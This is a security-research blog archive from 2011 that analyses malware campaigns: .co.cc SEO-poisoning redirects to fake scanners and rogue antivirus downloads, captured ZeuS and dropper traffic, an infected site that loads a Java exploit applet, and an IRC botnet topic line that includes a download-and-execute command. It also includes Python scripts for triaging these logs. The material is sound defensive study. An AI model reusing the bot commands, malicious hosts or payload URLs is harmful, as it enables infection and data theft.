Tag Archives: exploits

Suspicious activity for domains .co.cc

While doing some Google searches for particular keywords, we noted that in some cases the websites found had the same URL path after the .co.cc domain, and that all of them used a $_GET['k'] query parameter related to the keyword we were searching for. Almost all the links found also share the same HTML template and look like non-live websites; they may be used to capture keywords or be part of some kind of SEO poisoning activity:

Image

The secret has been revealed:

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

Response:

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2011 16:43:03 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Location: hxxp://includingwhich.cz. cc/in.cgi?4&seoref=[...]
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
 
....................

There is a redirect to… guess what? A fake scanner page…

Image

Image

A popup window prompts the user to download the rogue security software setup:

Image

Network traffic:

GET /get_file.php?id=16 HTTP/1.1
Host: mywebavck-2.co. cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
 
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:41:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Description: File Transfer
Content-Length: 331776
Content-Disposition: attachment; filename="setup.exe"
Connection: close
Content-Type: application/download
 
MZ......................@..................[...]

The setup file is almost entirely undetected by antivirus engines:

Report date: 2011-04-19 16:51:48 (GMT 1)
File name: setup-exe
File size: 331776 bytes
MD5 hash: c6adf910c8e56b4b0577ddface41898d
SHA1 hash: 978794a9705fec3f5dd5d7256b147a75d6c6f6fe
Detection rate: 0 on 10 (0%)
Status: CLEAN

A few of the malicious .co.cc domains used to capture keywords:


Note that the value after k= is the same as the page title!

Other related malicious domains:


All these malicious domains appear to be hosted at this IP address:

95.169.191.217
ns2.km35913.keymachine.de
95.169.160.0/19 - Keyweb AG IP Network
AS31103 - KEYWEB-AS Keyweb AG

IPVoid analysis:

http://www.ipvoid.com/scan/95.169.191.217

Recent malicious URLs analyzed #3

Report of the malicious URLs logged:

POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in
 
POST /logos/XXX/61e3a327d/logo.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: greatwebdata. in
 
POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in
 
POST /perce/XXX/21c383b7c/qwerce.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: migented. in
 
POST /college_news/college_news/college_news/college_news/build.php HTTP/1.0
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /help.txt HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136
 
GET /gx/444.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toxtb. info
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /gx2/333.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ucfya. info
 
POST /zeus/zeus/server%5bphp%5d/gate.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.nxmtv. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1015000813 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: susimumezez. com
 
GET /v14/setup.php?act=fb_start&id=XXX HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: udjng. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hawfruit. com
 
GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hslibrary. com
 
GET /2wave.php?Yfe6r8M2QkJI0l5aLwkkExXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://ad.adserverplus. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: utling. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: topsaj. com
 
GET /2wave.php?Yfe6r8U2QkJI0l5aLw0mEQKjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: http://trailersandvideos. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /in.cgi?groups HTTP/1.0
Referer: hxxp://sl.servednetworks. com/www/delivery/afr.php?zoneid=57&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m28m. in
 
GET /2wave.php?Yfe6r8k2QkJI0l5aLQwvHBXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://www.investopedia. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
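The .co.cc redirect chain in the first post and the raw request logs in this and the other "Recent malicious URLs analyzed" posts share one plain-text capture format: request blocks separated by blank lines, with hosts defanged by a space after the dot. As an added example (not code from the original posts), the Python script below parses that format, re-fangs the hosts and flags requests on the traits the posts themselves point out: non-browser User-Agent strings (the wget, Indy Library, NSIS_Inetc and "BF" clients, and the "SV1)ver71" junk suffix), paths seen on the TDS redirectors, fake-scanner pages, ZeuS C2 and the keyword pages, bare-IP hosts and direct .exe downloads. The sample log is constructed from request lines on this page plus one benign control request to www.example.com; the pattern lists are assumptions derived from these captures, not a complete rule set.

```python
import re
from dataclasses import dataclass

# Constructed sample in the blog's capture format (blank-line separated
# requests, hosts defanged with a space after the dot). Entries are copied
# from the logs on this page; the last one is a benign control request.
SAMPLE_LOG = """\
POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in

GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

GET /wawxb/kllpcttkx.php?adv=adv477&id=XXX&c=XXX HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: abcartel.com

GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com

GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc

GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0
Host: www.example.com
"""

# Client strings no real browser sends; each appears in the captured logs (assumed list).
BOGUS_UA = re.compile(r"wget|Indy Library|NSIS_Inetc|^BF$|^Mozilla$|^Mozilla/6\.0|\)\S+$", re.I)
# Paths the posts tie to TDS redirectors, fake-scanner pages, ZeuS C2 and keyword pages.
KIT_PATH = re.compile(r"in\.cgi|/fast-scan/|gate\.php|/config\.bin|/cfg\.bin|index\.php\?k=", re.I)
IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class Request:
    method: str
    path: str
    host: str
    user_agent: str


def refang(host):
    """Undo the blog's defanging: 'simplycomics. in' -> 'simplycomics.in'."""
    return re.sub(r"\.\s+", ".", host.strip())


def parse_capture(text):
    """Split the capture into blocks and read the request line plus headers."""
    requests = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.strip().splitlines()
        method, path, _version = lines[0].split(" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append(Request(method, path, refang(headers.get("host", "")),
                                headers.get("user-agent", "")))
    return requests


def triage(req):
    """Return the reasons a request is suspicious (empty list = nothing matched)."""
    reasons = []
    if BOGUS_UA.search(req.user_agent):
        reasons.append("non-browser or forged User-Agent")
    if KIT_PATH.search(req.path):
        reasons.append("path matches known kit/C2/redirector pattern")
    if re.search(r"\.exe(\?|$)", req.path, re.I):
        reasons.append("direct executable download")
    if IP_HOST.match(req.host):
        reasons.append("bare-IP Host header")
    if req.method == "POST" and re.search(r"\.(gif|png|jpg)(\?|$)", req.path, re.I):
        reasons.append("POST to an image URL (check-in disguised as image fetch)")
    return reasons


def suspicious(text):
    """Map 'METHOD host path' of each flagged request to its reasons."""
    findings = {}
    for req in parse_capture(text):
        reasons = triage(req)
        if reasons:
            findings[f"{req.method} {req.host}{req.path}"] = reasons
    return findings


def flagged_hosts(text):
    """Sorted, re-fanged hosts to feed a blocklist or a proxy-log retro-hunt."""
    return sorted({req.host for req in parse_capture(text) if triage(req)})


if __name__ == "__main__":
    for key, reasons in suspicious(SAMPLE_LOG).items():
        print(key, "->", "; ".join(reasons))
```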

URLVoid domain analysis:


Malicious URLs Hosting Fake Scanner Pages

We have detected a few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software.

Initial fake alert:

Image

Fake scanner page in action:

Image

Prompt to download the (infected) setup file of the rogue software:

Image

Report date: 2011-04-15 01:10:23 (GMT 1)
File name: bestav2-exe
File size: 374784 bytes
MD5 hash: a31da4fa72e277fe8abf298a4aa30d9d
SHA1 hash: 0f7bb119ff7889d3981d8ecdf2494c1cf4ba1a42
Detection rate: 7 on 10 (70%)
Status: INFECTED
Antivirus        Database     Engine        Result
Avast            15/04/2011   5.0           Win32:Renos-ACT [Trj]
AVG              15/04/2011   10.0.0.1190   FakeAlert.AAW
Avira AntiVir    15/04/2011   8.2.4.202     TR/Winwebsec.A.4010
Comodo           15/04/2011   4.0           TrojWare.Win32.Trojan.Agent.Gen
Emsisoft         15/04/2011   5.1.0.2       Trojan.Fakealert!IK
F-Prot           15/04/2011   6.3.3.4884    W32/FakeAlert.LY.gen!Eldorado
Ikarus           15/04/2011   T31001097     Trojan.Fakealert

There is also a reference to an external JS file:

<script type="text/javascript" src="hxxp://figaroo. ru/tools/ip.js"></script>

List of malicious domains and IPs:


At the end of a few of the fake scanner pages there is also a surprise:

Image

An obfuscated malicious JS code (note also the random function names at the end of the script) that most probably leads to an exploit kit. We can also extract the JS code from the file "/index_files/set00000.js", which is used to display the fake threats in the fake scanner page:

Image

URLVoid domain analysis:

http://www.urlvoid.com/scan/downloadmyprog.biz
http://www.urlvoid.com/scan/ratingswatchdiscussions.com
http://www.urlvoid.com/scan/purityanddivinityspa.com
http://www.urlvoid.com/scan/powerwerxmotorcorp.com

IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox:

:m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr
:Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/
:Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177

These details are related to an IRC botnet, and we can extract a few commands from them:

1. Bots whose country (-c) is FRA/ESP/ITA join channel "#it":

.j -c FRA,ESP,ITA #it

2. Download and execute a remote file:

.dl http://efirst-data. in/install.48208.exe

3. Enable module MSN spreader:

.mod msn on

4. Initialize MSN spreader:

.msn.int

5. Set MSN spreader URL:

.msn.set http://image4msn. com/
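As an added example (not code from the original post), here is a Python parser for the captured RPL_TOPIC (332) line above: it re-fangs the blog's defanged hosts, splits the topic into the five bot commands listed and extracts the tasking (country filter, channel, download URL, enabled module, MSN spreader URL) together with the hosts a defender would block. The command grammar is assumed from this single capture, and the bare "#" token between .msn.int and .msn.set is treated as a separator, matching the post's extraction.

```python
import re
from dataclasses import dataclass, field

# The RPL_TOPIC (numeric 332) line from the sandbox log above; hosts keep
# the blog's defanging (a space after the dot).
CAPTURED_TOPIC_LINE = (
    ":Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it "
    ".dl http://efirst-data. in/install.48208.exe .mod msn on "
    ".msn.int # .msn.set http://image4msn. com/"
)

# A bot command verb: '.j', '.dl', '.mod', '.msn.int', '.msn.set' ...
COMMAND_TOKEN = re.compile(r"^\.[a-z]+(?:\.[a-z]+)*$")


def refang(text):
    """Undo the blog's defanging: 'efirst-data. in/' -> 'efirst-data.in/'."""
    return re.sub(r"\.\s+([a-z]{2,6})(?=/|\s|$)", r".\1", text)


def parse_irc_message(line):
    """Split a raw IRC line into (prefix, command, params, trailing)."""
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    command, *params = head.split()
    return prefix, command, params, (trailing if sep else None)


def split_commands(topic):
    """Group topic tokens into (verb, args) pairs; each '.verb' starts a new one."""
    commands = []
    for token in topic.split():
        if COMMAND_TOKEN.match(token):
            commands.append((token, []))
        elif token == "#":
            continue  # assumed: bare separator between commands in this capture
        elif commands:
            commands[-1][1].append(token)
    return commands


@dataclass
class BotTasking:
    countries: list = field(default_factory=list)      # .j -c country filter
    channel: str = ""                                   # .j target channel
    download_urls: list = field(default_factory=list)  # .dl payload URLs
    modules: dict = field(default_factory=dict)        # .mod <name> on|off
    msn_url: str = ""                                   # .msn.set spreader URL
    raw: list = field(default_factory=list)            # commands as seen


def extract_tasking(line):
    """Turn a 332 topic line into structured tasking; None for other messages."""
    _prefix, numeric, _params, topic = parse_irc_message(line)
    if numeric != "332" or topic is None:
        return None
    tasking = BotTasking()
    for verb, args in split_commands(refang(topic)):
        tasking.raw.append(" ".join([verb, *args]))
        if verb == ".j":
            if "-c" in args:
                tasking.countries = args[args.index("-c") + 1].split(",")
            tasking.channel = next((a for a in args if a.startswith("#")), "")
        elif verb == ".dl":
            tasking.download_urls.extend(args)
        elif verb == ".mod" and len(args) == 2:
            tasking.modules[args[0]] = args[1]
        elif verb == ".msn.set" and args:
            tasking.msn_url = args[0]
    return tasking


def indicators(tasking):
    """Hosts named in the tasking URLs, ready for a blocklist or proxy-log hunt."""
    urls = tasking.download_urls + ([tasking.msn_url] if tasking.msn_url else [])
    return sorted({re.sub(r"^https?://", "", u).split("/")[0] for u in urls})


if __name__ == "__main__":
    tasking = extract_tasking(CAPTURED_TOPIC_LINE)
    for cmd in tasking.raw:
        print(cmd)
    print("block:", ", ".join(indicators(tasking)))
```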

Now the victim's machine sends the malicious URL to all of his MSN contacts:

http://image4msn. com/

This URL contains a Java exploit, as we can see here:

<body><applet code='mordor.saruman.class' archive='./games/plugins.jar'><param name='sko' value=[...]

Report 2011-03-28 14:19:39 (GMT 1)
File Name plugins-jar
File Size 9015 bytes
File Type Unknown file
MD5 Hash 7b0418be80084558cf34f6bdc2d5b112
SHA1 Hash 727d343bfd8f5bb970df10fed97eccb9562ac634
Detections: 0 / 9 (0 %)
Status CLEAN

This is an image of the malicious URL when visited:

Image

An unprotected folder reveals the existence of other files (exploit kit):

Image

Network traffic:

GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
POST /objects/ocget.dll HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: activex.microsoft. com
 
GET /d.php?f=18&e=0 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com

An executable file (PE) is downloaded:

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 12:22:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Pragma: public
Expires: Mon, 28 Mar 2011 12:22:17 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 91280
Connection: close
Content-Type: application/x-msdownload

MZ

Recent malicious URLs analyzed #2

Report of the malicious URLs logged:

POST /msql.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: www.adamplus. com
 
GET /coldman.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lostyear. ru
 
GET /czl/zlo.cl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casualhopperois. com
 
POST /zumboo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lameedge. ru
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rapidshare. com
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rs851tl2.rapidshare. com
 
GET /exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.zdropp.co. cc
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
GET /install.48208.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: efirst-data. in
 
POST /djcash.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: talkwire. in
 
GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc
 
POST /trackstats.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
POST /application.php HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 6199.zdropp.co. cc
 
GET /download.php?bundle=1 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: s6199.wdropp.co. cc
 
GET /list.php?c=XXX&v=2&t=0,2486841 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru
 
GET /tm/crypt.exe?t=0,6011011 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: www.derquda. com
 
GET /sn.php?c=XXX&t=0,8542902 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2900.2096; Windows NT 5.1.2600)
Host: justoldleft. ru

URLVoid domain analysis:


Recent malicious URLs analyzed

Report of the malicious URLs logged:

GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
GET /exe/key/key4_0322.exe HTTP/1.0
User-Agent: BF
Host: ac6211.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: zc8278.91mt.com
 
POST /piastro.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: deltadataserve.in
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: om4089.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: cz5834.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: bq8378.91mt.com
 
GET /zz7654/cfg.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /zlv.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
GET /maya.exe HTTP/1.0
User-Agent: Mozilla
Host: aaphonecard.com
 
POST /zz7654/g765.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: yuyu98.com
 
GET /e.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casinovergelijker.com
 
GET /wawxb/kllpcttkx.php?adv=adv477&id=XXX&c=XXX HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: abcartel.com
 
GET /emikavigat.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: xudezyj903.virtue.nu
 
GET /otasenaqynec.html HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: opytibuxi.virtue.nu
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ver71
Host: newpharmacyschools.ru
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: ql578.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: jz9233.91mt.com
 
GET /asp/xg.asp HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /exe/key/key_0323.exe HTTP/1.0
User-Agent: BF
Host: xx7314.91mt.com
 
GET /files/453734526/nig.exe HTTP/1.0
User-Agent: Mozilla
Host: rapidshare.com
 
GET /dw/dm.php?id=XXX&ver=dm0&v=2011_03_05&er=S_wd_rd_wrd_rrd_we_re_wc_rc_W5.1- HTTP/1.0
User-Agent: Mozilla/4.0 (SP3 WINLD)
Host: comcmdrun.com
 
GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jeqtzjte.co.cc
 
GET /install.34556.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thepackplace.in
 
GET /dl.php?i=15 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 2367.in
 
GET / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: releaseantivirus.com

URLVoid domain analysis:


New Rogue Software: Windows Support System

Windows Support System (similar to Windows Emergency System) is another rogue security software that claims to scan the system for errors; instead it shows fake errors and states that the full version of the software must be bought to fix the non-existent errors.

Windows Support System GUI

Fake security alerts:

Fake security alerts

Fake scanner page:

Fake scanner page

Other fake security alert:

Fake security alerts

Regedit is disabled:

Regedit disabled

Installer screenshot:

Installer

Windows Support System is distributed and spread by web exploit kits:

GET /count8.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: falsewi. com
 
GET /showthread.php?t=335918 HTTP/1.0
Referer: hxxp://sweetvegetables.gv.vg/showthread.php?t=4005006
Host: sweetvegetables.gv. vg

Setup.exe is downloaded:

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 00:50:50 GMT
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
Content-Length: 18944
Content-Disposition: inline; filename=setup.exe

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: setup.exe
File size: 18944 bytes
MD5 hash: d94f2733e1fa56dd00431927f72b68da
SHA1 hash: 8114e64151a8d64f4364933eb1e9cb28a39693bc
Detection rate: 0 on 9 (0%)
Status: CLEAN

Fake scanner page:

GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mbbckoua.co. cc

Download of another rogue security software:

GET /BestAntivirus2011.exe HTTP/1.0
Referer: hxxp://mbbckoua.co. cc/fast-scan/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dl.mbbckoua.co. cc

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: bestantivirus2011-exe
File size: 323584 bytes
MD5 hash: dcd660aa86a5cba024ce9d01bb76f45a
SHA1 hash: 3e85fa411bf9cb44049d61382cd95a66b7fb2180
Detection rate: 0 on 9 (0%)
Status: CLEAN

Another web exploit that distributes Windows Support System:

GET /1010/in.cgi?10 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: roleplaysanctuary.co. cc

Suspicious redirection:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='hxxp://erofax. ru/podm/go.php'">
</head>
<body>
document moved <a href="hxxp://erofax. ru/podm/go.php">here</a>
</body>
</html>

Fake scanner page:

GET /scan1b/images/sprite.png HTTP/1.0
Referer: hxxp://antivirus-9465.co. cc/scan1b/164
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Download of setup file of Windows Support System:

GET /scan1b/164/freesystemscan.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Fake payment system:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i-s&3=164&4=2600&5=5&6=1&7=62900.2180&8=1040 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc. com

URLVoid domain analysis:


Knowmore.org Infected with Malicious Javascript Code

John has informed us about another possibly infected website:

hxxp://www.knowmore. org

A fast scan with vscan.urlvoid.com reports that the site is infected:

Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED

We have dumped the content of the website:

Knowmore-org Dump

So we browsed the website in our test environment, and this is the result:

GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com
 
GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc

Now there is an attempt to load a Java applet:

<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>

New network traffic:

GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
 
MZ.............

The executable file setup.exe is downloaded:

Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
